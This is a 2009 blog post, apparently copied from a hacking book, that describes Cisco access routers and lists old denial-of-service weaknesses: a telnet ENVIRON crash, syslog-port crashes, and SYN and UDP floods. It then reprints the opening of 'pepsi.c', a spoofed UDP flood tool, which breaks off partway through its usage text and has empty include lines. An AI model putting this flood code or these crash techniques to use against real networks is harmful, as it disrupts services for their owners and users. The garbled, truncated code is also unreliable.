Sunday, December 6, 2009

Cisco

At the top of the access router market, Cisco (www.cisco.com) is a worldwide internetworking leader offering lines of modular, multiservice access platforms for small, medium, and large offices and ISPs. Cisco is a product vendor in approximately 115 countries, which are served by a direct sales force, distributors, value-added resellers, and system integrators. Cisco also hosts one of the Internet's largest e-commerce sites with 90 percent of overall order transactions. These access products provide solutions for data, voice, video, dial-in access, VPNs, and multiprotocol LAN-to-LAN routing. With high-performance, modular architectures, Cisco has integrated the functionality of several devices into a single, secure, manageable solution.



Liabilities

General Denial-of-Service Attacks

Synopsis: There is a DoS vulnerability in Cisco family access products. Hack State: Unauthorized access and/or system crash. Vulnerabilities: The following:

AS5200, AS5300 and AS5800 series access servers

7200 and 7500 series routers

ubr7200 series cable routers

7100 series routers

3660 series routers

4000 and 2500 series routers

SC3640 System Controllers

AS5800 series Voice Gateway products

AccessPath LS-3, TS-3, and VS-3 Access Solutions products

Breach: Consistent scanning while asserting the telnet ENVIRON option before the router is ready to accept it causes a system crash. Also, sending packets to the router's syslog port (UDP port 514) will cause some of these systems to crash as well. Common DoS attacks frequently encountered are TCP SYN floods and UDP floods, aimed at diagnostic ports. As described earlier, TCP SYN attacks consist of a large number of spoofed TCP connection setup messages aimed at a particular service on a host. Keep in mind that older TCP implementations cannot handle many imposter packets, and will not allow access to the victim service. The most common form of UDP flooding is an attack consisting of a large number of spoofed UDP packets aimed at diagnostic ports on network devices. This attack is also known as the Soldier pepsi.c attack, shown next and in Figure 9.4.



Pepsi.c



#define FRIEND "My christmas present to the Internet -Soldier"

#define VERSION "Pepsi.c v1.7"

#define DSTPORT 7

#define SRCPORT 19

#define PSIZE 1024

#define DWAIT 1





* Includes

*/

#include

#include

#include

#include

#include

#include

#include

#include
#include #include #include #include #include #include #include #include #include #include #include /*

Banner.

*/

void banner() {

printf( "\t\t\t%s Author - Soldier \n", VERSION ); printf( "\t\t\t [10.27.97] \n\n" ); printf( "This Copy Register to: %s\n\n", FRIEND );

}

/*

Option parsing.

*/

struct sockaddr_in dstaddr; unsigned long dst; struct udphdr *udp; struct ip *ip; char *target; char *srchost; int dstport = 0; int srcport = 0; int numpacks = 0; int psize = 0; int wait = 0; void usage(char *pname)

{

printf( "Usage:\n " );

printf( "%s [-s src] [-n num] [-p size] [-d port] [-o port] [-w wait]

\n\n", pname );

printf( "\t-s : source where packets are coming from\n" );



printf( "\t-n : number of UDP packets to send\n" ); printf( "\t-p : Packet size [Default is 1024]\n" ); printf( "\t-d : Destination port [Default is %.2d]\n",

DSTPORT );

printf( "\t-o : Source port [Default is %.2d]\n",

SRCPORT ); printf( "\t-

w

No comments:

Post a Comment